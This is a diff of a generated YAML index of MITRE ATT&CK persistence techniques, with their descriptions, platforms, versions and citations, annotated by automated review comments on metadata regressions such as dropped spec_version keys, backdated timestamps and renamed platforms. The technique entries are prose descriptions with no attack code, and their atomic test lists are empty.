@@ -34615,23 +34978,50 @@ persistence:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
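Review bot: T1556.005 loses `x_mitre_permissions_required` (`User`, `Administrator`) in the same way as T1556.001 above, together with the `x_mitre_attack_spec_version` bump from 2.1.0 to 3.2.0, so the removal looks systematic rather than accidental and should be called out in the PR description. The `external_references` entries are also reordered (`dump_pwd_dcsync` now first, `url` now after `external_id`), which inflates the diff without changing content.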
@@ -34648,7 +35038,7 @@ persistence:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
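Review bot: the contributor entry for T1546.016 changes from `Alexander Rodchenko` to `Rodchenko Aleksandr`, flipping to surname-first and changing the transliteration, while every other contributor in the list is given-name first. If this is the verbatim upstream value it is fine to carry, but confirm it is not a transposition introduced during regeneration.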
@@ -34707,7 +35097,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -34789,7 +35178,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1543.002:
@@ -34904,12 +35292,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1136:
technique:
- modified: '2024-01-31T20:46:43.215Z'
+ modified: '2024-10-15T15:53:21.895Z'
name: Create Account
description: |-
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -34932,16 +35319,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- Network
- Containers
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
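Review bot: for T1136 the `Azure AD`, `Office 365` and `Google Workspace` platforms are replaced by `Office Suite` and `Identity Provider` with a version bump to 2.5. Any per-platform index or mapping generated from the old platform names will no longer find this technique under them, so those indexes need regenerating in the same change, and the PR should state that the old platform names are gone throughout, not only in this block.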
@@ -34968,7 +35354,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.013:
technique:
@@ -35037,7 +35422,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.007:
technique:
@@ -35073,7 +35457,7 @@ persistence:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -35092,12 +35476,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35147,12 +35530,11 @@ persistence:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35185,9 +35567,10 @@ persistence:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
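Review bot: splitting `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` into two entries leaves `Naveen Vijayaraghavan` without the `(Gurucul)` affiliation that the original combined line could be read as covering both names. Confirm against upstream that only Nilesh Dherange carries the affiliation before merging; contributor credits are the one place a regeneration diff can misattribute silently.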
@@ -35204,9 +35587,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -35252,12 +35634,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1653:
technique:
- modified: '2023-09-30T21:28:45.038Z'
+ modified: '2024-10-16T20:11:40.334Z'
name: Power Settings
description: |-
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35271,7 +35652,7 @@ persistence:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Juan Tapiador
x_mitre_deprecated: false
x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35330,7 +35711,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.001:
technique:
@@ -35356,7 +35736,7 @@ persistence:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -35382,13 +35762,11 @@ persistence:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1137.002:
technique:
- modified: '2024-04-16T12:41:55.175Z'
+ modified: '2024-10-15T16:01:48.325Z'
name: 'Office Application Startup: Office Test'
description: |-
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
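Review bot: T1037.001 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` here, unlike the other blocks in this patch, which keep `x_mitre_attack_spec_version` when `spec_version` is dropped; the block is left with no spec-version marker at all, so check whether the upstream object really lacks `x_mitre_attack_spec_version` or whether the generator dropped a line it should have kept. The `modified` timestamp for this technique also moves back by more than a year (2021-04-29 to 2020-03-24).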
@@ -35412,8 +35790,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'Command: Command Execution'
@@ -35443,7 +35821,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1137.002
atomic_tests: []
T1547.008:
@@ -35486,7 +35863,7 @@ persistence:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -35511,12 +35888,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -35556,8 +35932,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -35565,13 +35943,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -35602,17 +35980,14 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -35675,7 +36050,7 @@ persistence:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -35709,8 +36084,8 @@ persistence:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -35719,6 +36094,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
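Review bot: the URL for the new `Malicious Life by Cybereason` reference ends in `#blog-subscribe`, a fragment pointing at a subscription widget rather than part of the article locator; strip it so the reference reads `https://www.cybereason.com/blog/wmi-lateral-movement-win32`. The author is also recorded as `Philip Tsukerman` with `(n.d.)`, whereas the neighbouring entries use surname-initial form (`Russinovich, M.`), which is worth aligning if the index is meant to mirror the upstream citation style.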
@@ -35731,12 +36110,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -35749,6 +36127,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -35785,17 +36164,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -35841,9 +36220,65 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.007:
technique:
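Review bot: the `- spec_version: '2.1'` line is dropped from this object (just before `atomic_tests: []`) and, as the rest of the patch shows, from every other technique object, with no replacement key. If anything that consumes this index reads `spec_version` to validate or route the STIX objects, that read now fails silently, so either keep the key or state in the commit message that nothing downstream depends on it. The new T1546.017 entry itself is fine to land with `atomic_tests: []`, but note that its `x_mitre_detection` text carries upstream's mixed formatting (`/etc/udev/rules.d/` and `/lib/udev/rules.d/` in backticks, `/usr/lib/udev/rules.d/` bare); that belongs upstream, not in a hand edit of the generated file.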
@@ -35880,7 +36315,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
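Review bot: the `modified` timestamp for T1546.007 moves backwards, from '2022-05-11T14:00:00.188Z' to '2022-04-20T17:09:17.363Z'. The same backward move appears further down for T1556.004, T1574.004, T1574.012, T1205.002, T1568.001, T1205 and T1572. Confirm the generator is reading the intended upstream ATT&CK release rather than a stale bundle; a regressing `modified` date would also defeat any "re-import only if newer" check a consumer applies to these objects.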
@@ -35904,51 +36339,11 @@ persistence:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1505.001:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
- type: attack-pattern
- created: '2019-12-12T14:59:58.168Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1505.001
- url: https://attack.mitre.org/techniques/T1505/001
- - source_name: NetSPI Startup Stored Procedures
- url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
- SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
- - source_name: Kaspersky MSSQL Aug 2019
- url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
- description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
- attack on Microsoft SQL Server. Retrieved September 4, 2019.'
- - source_name: Microsoft xp_cmdshell 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
- description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
- September 9, 2019.
- - source_name: Microsoft CLR Integration 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
- description: Microsoft. (2017, June 19). Common Language Runtime Integration.
- Retrieved July 8, 2019.
- - source_name: NetSPI SQL Server CLR
- url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
- description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
- Retrieved July 8, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-15T16:05:24.007Z'
name: SQL Stored Procedures
description: "Adversaries may abuse SQL stored procedures to establish persistent
access to systems. SQL Stored Procedures are code that can be saved and reused
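Review bot: this hunk deletes the platforms, domains, contributors, marking refs, id, created date and all five external references of T1505.001, and the very next hunk re-adds the same content under a different key order. The content survives, but the emitted YAML key order is evidently not stable between runs of the generator; a fixed field order or `sort_keys` in the serializer would reduce this roughly eighty-line churn to the handful of lines that actually change (the `modified` date, the version bump and the updated NetSPI URLs) and make future ATT&CK syncs reviewable.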
@@ -35971,20 +36366,57 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_deprecated: false
x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
NetSPI Startup Stored Procedures) Consider enabling audit features that can
log malicious startup activities.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
